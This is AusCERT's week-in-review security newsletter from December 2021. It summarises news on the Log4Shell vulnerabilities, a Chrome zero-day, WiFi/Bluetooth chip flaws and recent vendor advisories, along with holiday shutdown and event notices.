//Week in review - 17 Dec 2021

AusCERT Week in Review for 17th December 2021


With only seven sleeps until Christmas, the realisation that the end of the year being upon us has well and truly set in!

A reminder of our scheduled shutdown over the Christmas and New Year period: AusCERT will be closed from Thursday, December 23rd until Monday, January 3rd 2022. We will reopen on Tuesday, January 4th 2022.

The auscert@auscert.org.au mailbox will not be monitored during this period. However, we will staff the 24/7 member incident hotline as usual; so do call us for any urgent matters during this period.

If you’re looking for something to do over the break, don’t forget the Call for Presentations for AusCERT2022 is OPEN! We’re looking for something unique, a great story or, something new that can be shared with our attendees. The closing date for submissions is January 10th so be sure to get your idea to our committee to ensure feedback can be provided by the final deadline of January 30th.

Also AusCERT is hiring, so if you’re interested in infrastructure, putting together security solutions and working collaboratively with cyber security analysts, brush off your resume and send it to us over the break!

Something that we have been reminded of this past week with Log4J, is that the world of cyber doesn’t have holidays and we must always remain vigilant.

A recent blog from Seriously Risky Business provides a great overview of the situation and suggests how future occurrences of similar incidents can be avoided.

Another blog post, this time from Rapid 7, highlights how threat actors seek to take advantage of large scale vulnerabilities such as Log4J, often working just as hard as those trying to remedy the situation, but with the aim to exploit the vulnerability.

As this is the last Week In Review before Christmas, and with a lot of folk switching off for a well-earned break, the team at AusCERT wanted to wish everyone a safe and happy Christmas and Festive Season and all the very best for 2022.

Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation
Date: 2021-12-11
Author: Microsoft Security Blog

[This article is focused on the use of Microsoft security products to mitigate exploits. See also ASB-2021.0244.2, published December 10.] Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”.
The vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component. For more technical and mitigation information about the vulnerability, please read the Microsoft Security Response Center blog.

Bugs in billions of WiFi, Bluetooth chips allow password, data theft
Date: 2021-12-13
Author: Bleeping Computer

Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves it’s possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device’s Bluetooth component.
Modern consumer electronic devices such as smartphones feature SoCs with separate Bluetooth, WiFi, and LTE components, each with its own dedicated security implementation.

Second Log4j vulnerability discovered, patch already released
Date: 2021-12-15
Author: ZDNet

A second vulnerability involving Apache Log4j was found on Tuesday after cybersecurity experts spent days attempting to patch or mitigate CVE-2021-44228.
The description of the new vulnerability, CVE 2021-45046, says the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was “incomplete in certain non-default configurations.”
“This could allow attackers… to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack,” the CVE description says.

Why Companies Shouldn’t Shame Employees Who Fall for Hacking Scams
Date: 2021-12-06
Author: Wall Street Journal

[This article may be behind a paywall for some readers] The implications of our survey were clear: Shame is similar to a boomerang that will come back to hurt the organization, as well as harming the employee. Managers should deal with the mistake, but not reject the employee. If employees feel that their personhood is being attacked, they will respond defensively. Shaming results in a lose-lose outcome.
Employees can be an organization’s greatest asset when it comes to defeating the efforts of cybercriminals. Using shame as a behavior modification tool squanders that potential. And that’s the real shame.

Google pushes emergency Chrome update to fix zero-day used in attacks
Date: 2021-12-13
Author: Bleeping Computer

Google has released Chrome 96.0.4664.110 for Windows, Mac, and Linux, to address a high-severity zero-day vulnerability exploited in the wild.
“Google is aware of reports that an exploit for CVE-2021-4102 exists in the wild,” the browser vendor said in today’s security advisory.
Although the company says this update may take some time to reach all users, the update has already begun rolling out Chrome 96.0.4664.110 worldwide in the Stable Desktop channel.

Actively Exploited Microsoft Zero-Day Allows App Spoofing, Malware Delivery
Date: 2021-12-14
Author: Threat Post

Microsoft has addressed a zero-day vulnerability that was exploited in the wild to deliver Emotet, Trickbot and more in the form of fake applications.
The patch came as part of the computing giant’s December Patch Tuesday update, which included a total of 67 fixes for security vulnerabilities. The patches cover the waterfront of Microsoft’s portfolio, affecting ASP.NET Core and Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (Chromium-based), Microsoft Office and Office Components, SharePoint Server, PowerShell, Remote Desktop Client, Windows Hyper-V, Windows Mobile Device Management, Windows Remote Access Connection Manager, TCP/IP, and the Windows Update Stack.

Australia to establish youth advisory council for countering online child exploitation
Date: 2021-12-15
Author: ZDnet

Australia will create a new panel consisting of Australian youths and young adults that will provide consultation to industry and government about how to approach regulating online platforms.
“Young people know better than anyone about the good, the bad and the plain ugly that exists in the online world,” Prime Minister Scott Morrison said. “They are the first generation of Australians to grow up living simultaneously in both the real and digital worlds, and they are always at the forefront of new technologies.

Visa pilots enumeration attack prevention requirement in Australia
Date: 2021-12-15
Author: IT News

Visa has chosen Australia as the first country worldwide where all “e-commerce payment providers” must have botnet detection capabilities in place by October to mitigate the threat posed by enumeration attacks.
The payments giant said it could not fight a rise in enumeration attacks alone and needed the assistance of the entire payments ecosystem.

ESB-2021.4192 – apache-log4j2: Execute arbitrary code/commands – Remote/unauthenticated

An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled

ESB-2021.4268 – Safari: Execute arbitrary code/commands – Remote with user interaction

Processing maliciously crafted web content may lead to arbitrary code execution on Safari browser

ASB-2021.0245 – ALERT Microsoft Windows: Multiple vulnerabilities

Microsoft has released its monthly security patch update and the update resolves 38 vulnerabilities across their products

ASB-2021.0252 – ALERT Microsoft Edge (Chromium-based): Multiple vulnerabilities

Microsoft addressed a Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability on their newest update

ASB-2021.0253 – Azure Products: Multiple vulnerabilities

Microsoft states “Successful exploitation allows for arbitrary code execution in the targeted application”

Stay safe, stay patched and Merry Christmas and a Happy New Year!

The AusCERT team